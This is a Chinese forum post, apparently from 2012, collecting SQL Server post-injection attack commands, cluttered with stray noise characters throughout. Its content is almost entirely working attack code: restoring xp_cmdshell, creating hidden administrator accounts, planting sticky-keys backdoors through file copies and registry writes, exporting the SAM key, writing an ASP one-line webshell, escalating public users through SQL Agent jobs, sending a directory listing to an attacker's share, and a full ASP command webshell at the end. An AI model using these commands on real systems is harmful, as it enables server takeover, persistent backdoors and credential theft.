1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
" x8 G* B9 E/ ~1 W" o0 ]. S恢复方法:查询分离器连接后,
( l2 o) [/ n) m5 D1 E第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int % o7 {- N, M6 h* D* J7 w
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 4 t" z$ [. Q. B5 a! a, l; K- k
然后按F5键命令执行完毕
6 M$ ~; e7 `: L2 J# n3 ?; a M& l
! c6 t# C6 |: h% l& f2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
$ R% i) s3 U% q& u2 H$ Z$ t \恢复方法:查询分离器连接后,
/ ]* y$ v; Z6 e% x# G4 @. C第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
) D. f; h$ t9 c/ w# X; K第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'# Y4 Y: j7 {# ]' x* w9 _$ v
然后按F5键命令执行完毕
; V; U. B% o \$ e+ ?5 ~
3 `/ Y4 Q, ^8 ^9 r3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)3 f" L, {& H) m" S* p) N+ q. h" h
恢复方法:查询分离器连接后,( C7 ~( {) B. N$ L/ x {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
. [8 p, t( v& D/ _第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' - R" `/ X- \% y3 z* l+ Z
然后按F5键命令执行完毕
) K1 t; t) M4 z; b5 K8 i' |2 o* `' x4 M9 @4 \! L0 o% L1 Z
4 终极方法.
% b$ J# v1 t* Z1 T4 a& c如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:" o1 X0 f! h, D U
查询分离器连接后,2 M; u! N% z4 Z
2000servser系统:8 G/ x L2 g1 H2 R. K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'/ @% N' j: X3 d+ @
7 Y; n8 ~: Z, U' [' u- `: g. }) l/ p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'# S) q. T" I- P8 b4 P5 D+ C
H( B3 b* T8 T1 c4 S, mxp或2003server系统:
" \9 t" v3 p* M! y8 b5 \0 Q4 K' t4 V0 Z. Z& }9 I1 w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'- G- B7 ~( q% ~- B" Y- A' b
" d0 P' u+ Z% `. e7 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
3 C0 P" X- n& h& `- [; M2 \0 u" O- F. l1 h q; \
& o4 G6 Q$ s) A
五个SHIFT
4 B5 C# H: V% edeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';; s5 X# s* ^8 q% Z. L
& B! @- P& P- v) i
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
* K# O& t" ?5 n4 J2 O% g1 Z" m. C& b3 e U
xp_cmdshell执行命令另一种方法! G" g! t" e) T x
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' : t4 O) w( D2 ]3 v6 }" l
, j. `7 _ W; m. e
判断存储扩展是否存在
* ?8 j; o+ q- C/ qSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
, i/ m `: E0 j+ p& c; D) Z返回结果为1就OK
4 ~8 o5 d' G+ b- ]! Z% o! ]6 g
1 ^8 k6 k! m4 V- p. x* Y8 p; l
3 b: Z7 Z9 J5 B) A, v" I! t; r4 ?上传xplog70.dll恢复xp_cmdshell语句:9 k- b$ B- {& `5 Q8 e# z3 b
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
& a9 s; G7 `0 `+ Y3 R" L/ \0 L6 K
$ R) s8 D& Y& y' G, K5 U, H否则上传xplog7.0.dll. h( A# C* ?* @9 l: V, O& L; D
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
! d9 z! @% b4 X5 T. I; K9 [7 i8 X6 L; w/ ?. w8 u% @
2 H* H+ x& Y2 F' e! q% _5 Y+ T$ k
% R4 T) w6 O" C首先开启沙盘模式:
( W) N8 `( m2 p' Aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! b& W: M, f( G! o
& S8 c. C$ K# q6 m4 e# @
然后利用jet.oledb执行系统命令
. ~1 o- G2 _; y/ J9 Sselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
4 i- F4 |) n. y5 m# S+ b( ^返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
% A: P! E# X r/ s7 h8 q: Z( f5 r; P1 `
, C4 s+ h8 T$ E& |6 O* q
+ b3 x4 o( t' d& K' v4 K恢复过程sp_addextendedproc 如下: $ ?+ \& Q8 m3 q! d
create procedure sp_addextendedproc --- 1996/08/30 20:13 & _: F# ~2 z% X4 @# V7 `
@functname nvarchar(517),/* (owner.)name of function to call */
2 z4 G! Z( I" \5 g5 c@dllname varchar(255)/* name of DLL containing function */ 0 h+ v) m( G: E% ?$ a
as
' Q$ S& M* |4 K* M; pset implicit_transactions off 9 [: c; R8 @! q2 p
if @@trancount > 0
- @- [! u: x( s p' n, ibegin * Q# Z5 h6 x4 N: S0 T& U3 W, V
raiserror(15002,-1,-1,'sp_addextendedproc')
( t: s A, b: k7 G. J: oreturn (1)
6 G( d) j# e7 r8 Uend
1 c: Z+ f# g9 x* rdbcc addextendedproc( @functname, @dllname)
; O* W9 K: N/ u1 |& F/ t7 x H0 Zreturn (0) -- sp_addextendedproc 2 N5 u+ R' E D- P: u7 H
GO
! Q' z: z* O; Z2 g% F
1 V# m3 J8 Q9 _2 T" ^) w- R! U; k7 z9 T- q3 r% @! `/ ^: F: J/ T
; g' O, w7 {+ F% g
导出管理员密码文件
7 e5 }# u1 z. r% \) Isa默认可以读sam键.应该。
) b7 w7 N" h$ J% }: preg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg5 Z6 K& z& Y; M" ]
net user administrator test5 V3 R- x( J7 `$ f! S1 c. b1 b
用administrator登陆.
; o1 _% q' G% Z& A. C; K6 W用完机器后
' f$ c- C `/ D n+ H5 Vreg import c:\test.reg
) M5 G+ n, {" d: P0 J8 T; Y0 X8 [2 D根本不用克隆.6 }$ ^" Y! s; x+ H. D
找到对应的sid. . o& A) s, A8 T7 y/ a* } c
2 K! _- H7 f& a% T8 L8 i
. Z. S: v. N; {) b. w2 c' M
7 N# g: B& ~- l$ Q1 b8 L* o
恢复所有存储过程; F* Z' P; f v, Q$ I1 J& q
use master + ^; ~' w+ b1 g, s# u% |5 ?- ]* S
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' . O5 w% Y$ f y
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' - s8 [; i, a) \
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' : \5 Z& D+ B; c& d7 V2 c3 ]: Z
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
2 ^3 b- }3 E$ K8 j8 i! a6 r$ Nexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
+ X. `+ m( B6 K7 C! eexec sp_addextendedproc sp_OACreate,'odsole70.dll' % |1 d5 a1 A6 b. ~' Z m" r
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
* }6 F, F3 g# x3 Nexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 2 t4 y: ]$ C( F2 P" S
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' / J0 E7 ]' o# E7 D) w2 x: T- [
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' 6 A$ f4 @& ]2 a9 p- }
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
3 ] k4 f1 r9 P& j) Bexec sp_addextendedproc sp_OAStop,'odsole70.dll' 0 ~0 w1 x# _ j$ Q" y
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
5 a# n. F# v9 v) c! O/ A1 `. T/ t Lexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
8 f. _- p; m& q; Kexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
h, C: ]( q/ t: O0 ?exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
5 ^# S0 s/ Z! F4 e' k1 L: \exec sp_addextendedproc xp_regread,'xpstar.dll'
( z" d. l( a+ `# Y! o8 w4 n rexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
6 v7 e+ ?) O7 V1 f2 ~% m- g, b0 ~exec sp_addextendedproc xp_regwrite,'xpstar.dll'
; Y2 I2 n: P/ V0 G3 [( O3 eexec sp_addextendedproc xp_availablemedia,'xpstar.dll'8 h* C6 {/ p* }# V/ r8 Z7 l% g
1 ?) G& j* m6 k; S3 B
, M5 n1 i3 P+ \建立读文件的存储过程0 M& S! [% j6 e0 D5 x4 R: H* d
Create proc sp_readTextFile @filename sysname! Q, s$ B9 T5 w) Z# ]$ S
as
& z6 I4 J( j$ D* u% O$ V6 |) R! @. Z: N/ o; P( g
begin 8 h N- f6 S8 R* D' {
set nocount on
8 H* |9 K' z9 `$ ~$ g- ? Create table #tempfile (line varchar(8000))
4 r9 Q5 D) f f% E$ D; F% G. j exec ('bulk insert #tempfile from "' + @filename + '"')
& w: x7 n5 ?/ e% L8 L select * from #tempfile5 {1 D$ U9 Z! C) V
drop table #tempfile9 o& X7 e, _4 k: z4 a, d( p
End) h$ ?9 I1 f- o0 e- c7 m
7 I# Z8 }# @2 S8 e# W
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件+ s4 {# ?6 c. Y& r' |3 z+ a6 W
查看登录用户
1 ^! t) V8 [% E2 LSelect * from sysxlogins
' K$ x. Z+ @9 e7 A
3 `: k- |; u" f* u4 [把文件内容读取到表中; u) y% s/ ?# v3 R* x
BULK INSERT tmp from "c:\test.txt"8 e% ~; z$ g+ c* V
dElete from 表名 清理表里的内容
9 o+ Z& M* j) ~% b( h" hcreate table b_test(fn nvarchar(4000));建一个表,字段为fn8 r2 d7 H$ I) _8 S* R: y8 F. J; G
# ^- W8 s/ G& S' ]+ D K
& I& D0 y- [+ \$ n4 o9 _+ r1 H
加sa用户1 ~* x( U7 B# [% }1 U$ @8 E
exec master.dbo.sp_addlogin user,pass;( B& U! L8 L: B, ], J7 b
exec master.dbo.sp_addsrvrolemember user,sysadmin$ i. {5 F' j9 p" J( `
: p# t* F1 y5 A: [; U
# d" G( Y& I' X% V4 ?5 p3 k3 g6 Q
: G0 k& v2 x3 n+ O
读文件代码
7 k3 d% I$ d9 l5 R) X# @. Rdeclare @o int, @f int, @t int, @ret int8 l* Y; }: X Q4 |) V4 U% q
declare @line varchar(8000)
" [. k; ~" u- }& j* {exec sp_oacreate 'scripting.filesystemobject', @o out( s6 e! M5 b3 W m* r7 ]
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 17 c( l- {9 g* ^& Z
exec @ret = sp_oamethod @f, 'readline', @line out$ ~. p' G, p ?( c! H4 c* ~6 Q
while( @ret = 0 )
0 L+ \0 g) k3 J' z7 Y3 ?2 }begin
! n0 \ O0 w( @0 l' W3 C5 y) z2 uprint @line
, A! _. g. U8 S" z, l9 K( n: s% ~exec @ret = sp_oamethod @f, 'readline', @line out
5 w5 s; Y0 Y" N3 r; O1 Iend' G4 x3 }) n% M/ f1 Z; h. j
/ E8 w( X z7 x( i h4 z
6 E3 i& M5 s5 h0 H" j* `5 j8 a, |2 @. e写文件代码:
2 H1 B+ R0 w9 o( o2 ddeclare @o int, @f int, @t int, @ret int, W0 ^8 o* M, I( H: ^9 B8 {' ]
exec sp_oacreate 'scripting.filesystemobject', @o out/ Z7 s* f3 G5 m* m* E
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
5 D/ t) p+ h4 F7 w, Y) r# H h/ vexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
0 F% m( S6 I7 p2 u4 p0 Y6 \5 z3 E% c9 G" @. c' f! ]
, J4 }) b9 M- }+ l
添加lake2 shell
3 B$ t) ], x. q" n6 Xsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
8 Q0 z: \/ t, I5 s) y7 Usp_dropextendedproc xp_lake2$ c# D# K+ {# Z5 |0 f8 E
EXEC xp_lake2 'net user'
* f8 @2 T# e9 t0 @! J2 R* S; k& D, Z
1 R6 x/ @" C8 Y' B- r# Y" m5 h' G得到硬盘文件信息
9 H8 ] m# a8 h( Z) N X--参数说明:目录名,目录深度,是否显示文件 6 ?) t* Q! T1 l! M: Z
execute master..xp_dirtree 'c:'
5 k7 j* d2 A! Lexecute master..xp_dirtree 'c:',1
7 I2 u. m! `' j) d$ ~1 M4 k0 D" [execute master..xp_dirtree 'c:',1,1
9 k1 }2 {3 k6 t1 B' f7 t* h/ W. T
2 s+ D0 k3 E) y+ S }4 M9 ~9 r# p& d! K2 x# P9 D, R# h! q
读serv-u配置信息
5 F/ @+ ]9 s8 }9 Rexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
! N( i x- n- E" j' a6 y: Sexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
' {+ `4 u% K' D( g( ^; {% L0 e! B; I, ]7 g5 i7 z6 C+ D
通过xp_regwrite写SHIFT后门/ @1 d9 f$ x2 g' r! E
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
8 }# B0 G+ i% Z1 x4 z
" a; Z5 V& z- b P
* j" o6 \2 e) z4 s2 u3 ~4 q
' _1 S' f* s6 k找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';2 l, q6 x4 J- Y
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
, q3 f* {7 C6 J: A2 X2 ]2 v- c2 O: ^/ M
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
# e, f% M* P* R1 X' `4 f' L* d8 ~# j: ?4 g3 j. l3 D. a
' e# I' l& i9 g/ v+ @+ @# Y. \& G( J& o5 V/ x9 y/ c" z
sql server 2005下开启xp_cmdshell的办法( Q) H# ^/ e* s# M1 @
4 g7 k# t- J6 t: B' D+ wEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;* S6 @ }. g; x# I1 q7 }( u+ ?
2 a7 q, q2 B- n' @
SQL2005开启'OPENROWSET'支持的方法:* h( C: a2 P. v' T. w
* Y5 a% r3 p$ w+ n" l/ s( x9 E
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
! ]7 ^. A" j$ o5 W. L
6 o# f3 d! d* VSQL2005开启'sp_oacreate'支持的方法:5 c9 T& m7 B# z& o* E/ G
3 y# e9 G! z, I4 x8 ]1 p! t: Fexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;$ o+ o3 u! L( B# S5 Z# F
6 }+ Q+ c6 `% h( z! }/ g' Z1 z6 ^5 I9 C* ^1 q, s% Y, a
. f# x- O4 X& ^" }& M/ t; T
/ P9 c6 J* D& F& A8 T b' S7 m8 l+ n% G4 b% S; S e: y% c% B
8 [$ R* l: s' V; e1 u; l& v; C3 S# r4 j( v' {
& v M9 f9 B6 T$ U. L4 c: ~
6 O5 m5 q; a& i' _2 g6 \" V0 L
M! f. V$ x7 f1 o( y6 C- V% d2 ^6 W+ J" E- F) Z" f, T- C
, C' ?: t% z$ G1 W
1 ?1 C7 e$ a) B9 S, Q
- t0 H4 E" [+ f+ L! L+ P; T9 z1 m1 Y1 E6 p1 e! R# U* g1 J
9 z4 P6 v9 E% `1 E( s4 m7 ^
S# i' j& e7 ?8 a7 ^* d' [% \- k: F+ z+ u: B
' \8 ]4 ^* ^+ v, ]+ |5 o1 K& ~. [. S1 L5 Y1 t
/ f2 P0 ^ [9 X4 }
# b5 W9 h. m h+ R8 O) f6 C3 I
7 s$ ] X; d# B' g% T0 {" P- _' e" p- p; e! h" N7 n `$ R
以下方面不知道能不能成功暂且留下研究哈:
' p2 g( n$ [' O8 B; N4)+ i# w- L. X! J6 X4 W! i
use msdb; --这儿不要是master哟
) k8 y) k7 P( p: f$ R5 M0 Wexec sp_add_job @job_name= czy82 ;& [) P* l( p$ L( w/ _
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
, Z* c7 l+ t% ?+ B6 w6 w) g- yexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
9 j# F: E/ U/ s) M" w }# Texec sp_start_job @job_name= czy82 ;
2 X. Y# Z$ j( x! e8 N1 r6 p8 c' ]+ |8 m4 `: _7 s" S0 E h) |
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以# r! x0 x" e8 U, U6 K- L
执行tsql语句了.
- ~( J7 D/ {/ }& x对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名: s2 J1 _' n, X. H
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧), v. n* Z: n, ]9 K
net start SQLSERVERAGENT. p; s+ W/ @, l$ Z
5 y! z8 w5 t* K7 R5 o6 ]
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的0 Y$ m* I8 z9 p
USE msdb
! ^& E! W% Z0 n5 wEXEC sp_add_job @job_name = GetSystemOnSQL ,
7 Y3 ~! [/ F; E6 X& w' s@enabled = 1,
+ j% M$ C9 i$ I0 h+ J: U. n, Q@description = This will give a low privileged user access to9 P' }, P! [/ W8 o8 }$ V5 ?
xp_cmdshell ,
1 }' u. @+ L/ F# N3 d@delete_level = 1
. C; X3 }* r+ w0 gEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
) f5 h! L# R# Q' _2 V9 ?/ e@step_name = Exec my sql ,
+ H2 d. S3 E: q+ |" c2 a1 O% t@subsystem = TSQL ," X9 d) R$ ?% Z3 Y: v
@command = exec master..xp_execresultset N select exec7 w) ?! O* Y$ ^; e% p7 K9 D
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
* P0 M0 {* q2 wEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
- b( P6 d' x. z C@server_name = 你的SQL的服务器名
+ A* _' B. B4 c) \EXEC sp_start_job @job_name = GetSystemOnSQL
$ y4 N: w# h9 U5 j
3 X- l, `; F5 q+ Z1 W不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以% W- Q2 p( W8 \7 c2 M* H
才让我们可以以public执行xp_cmdshell% z2 p- I) G* R( ]( E3 P
# Z* L# {" X7 W1 V3 L& c" `7 h" y5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
- V, }3 N$ Z9 M1 O" Y在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968" ^1 u' e, I' f) |
/ P: V1 u% X' cUSE msdb
+ f. u' x' g6 N% O! {1 lEXEC sp_add_job @job_name = ArbitraryFilecreate ,
$ W; B Y+ d1 `3 r2 p@enabled = 1,
( y3 H" e" A* ~@description = This will create a file called c:\sqlafc123.txt ,! G% v- ]8 b# t$ y' U* @6 n
@delete_level = 1
( G" J# v1 [, cEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
/ \/ Q; P3 M( H@step_name = SQLAFC , j; Y8 k# B' m% f8 f5 U
@subsystem = TSQL ,3 r/ F9 b9 e! t* m: k
@command = select hello, this file was created by the SQL Agent. ,
4 x0 \5 [! f3 \( H# D@output_file_name = c:\sqlafc123.txt ; {5 R: X$ z$ m2 `: b `
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
, w& t/ F1 \( j9 P+ ]1 p* X4 a8 _@server_name = SERVER_NAME
. b! E$ v# k; |9 `EXEC sp_start_job @job_name = ArbitraryFilecreate 4 {* f: g5 z- u4 W
1 J) j* `% s" z" @& d2 d
如果subsystem选的是:tsql,在生成的文件的头部有如下内容; g/ U$ [+ P- h* J% M/ X
% M( X& _7 ]7 k9 n& ~2 t2 v??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:191 i9 U* L9 d5 ~6 C5 P" [; V1 T$ [. `
----------------------------------------------
E z2 u* L- _0 K! i% F& Nhello, this file was created by the SQL Agent.
3 ?# N* ~0 _2 |7 p+ I
3 L$ s7 G* P( q3 w* U5 r2 |2 O(1 ?????)
& G. b" X% Y, ^; F; U
0 z' T* M& K2 t所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员- G# ]" r6 }0 i! h
命令的vbs文件到启动目录!- a" k. Q ?- o9 E
+ t* V. |6 H+ D0 t# F" {6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
+ p( n! Z6 {" R6 l; i关于sp_MScopyscriptfile 看下面的例子1 K+ p' |2 r4 G& u: i# ~) }1 f
declare @command varchar(100) . T6 i4 Y- A9 ]
declare @scripfile varchar(200)
% e. ?/ U/ g; `set concat_null_yields_null off . m2 f7 U; d c5 j& Q' z+ E. F
select @command= dir c:\ > "\\attackerip\share\dir.txt"
8 }& g9 m+ U+ X. T" b1 g5 l& t) Iselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
0 N' L9 x9 U1 Z( G8 X) Oexec sp_MScopyscriptfile @scripfile , $ O. r2 X; ?5 Q3 P$ u
6 [5 e- I0 a0 S- u0 p8 g这两个东东都还在测试试哟
+ ^9 Y' S6 I# n# \* t让MSSQL的public用户得到一个本机的web shell
7 F* F" g$ y( R, h6 V- }
3 P/ y" W1 z3 F+ a3 @# X7 L |sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,+ D2 c, ?% B. J2 [7 T& P8 } K( Q9 S" a! \
--@query= select <img src=vbscript:msgbox(now())> , ?( f& e5 Z4 _$ `4 s5 C! e# J
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
& ^' j& ~" W# G) u* F- R( ?@query= select V. P }7 U( ^
<%On Error Resume Next
/ H: j" z. V5 l! C6 F% W0 JSet oscript = Server.createObject("wscript.SHELL")
7 w$ U8 Q+ B0 E5 } j2 L1 SSet oscriptNet = Server.createObject("wscript.NETWORK")
% I7 |7 }1 c1 S" lSet oFileSys = Server.createObject("scripting.FileSystemObject")
! l5 p+ }4 c% bszCMD = Request.Form(".CMD") - y- {" X$ M/ d
If (szCMD <>"")Then
; D" i" _7 Q/ Y, q( zszTempFile = "C:\" & oFileSys.GetTempName()
' R) l( ` j( f9 D6 ECall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) - l7 O X' w0 z6 o
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
3 S0 V a0 f3 F* Z2 _ qEnd If %>
) B3 g5 e4 b' e/ v<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> ' B8 ^: a/ v7 n4 D; W3 ^
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
# S! ^" Z5 R" k; \, t( R0 b8 W! T9 q; q</FORM><RE>
V+ ~) Y/ ]7 ^3 u* j9 g<% If (IsObject(oFile))Then ( r1 _) D" q' Z5 }
On Error Resume Next
1 R1 `" h2 V" [% o. jResponse.Write Server.HTMLEncode(oFile.ReadAll) 9 _8 f( w6 N/ X! f
oFile.Close - l$ l1 B9 g% X+ o* w8 P
Call oFileSys.deleteFile(szTempFile, True)
- }; [) n% O' a' `1 S; HEnd If%>
9 R# t- X( O& V2 I# ^$ q& j( Z</BODY></HTML> 1 {7 A* T+ q+ {+ d: m# i, M
|
发表于 2012-9-15 14:37:30
收藏
支持
反对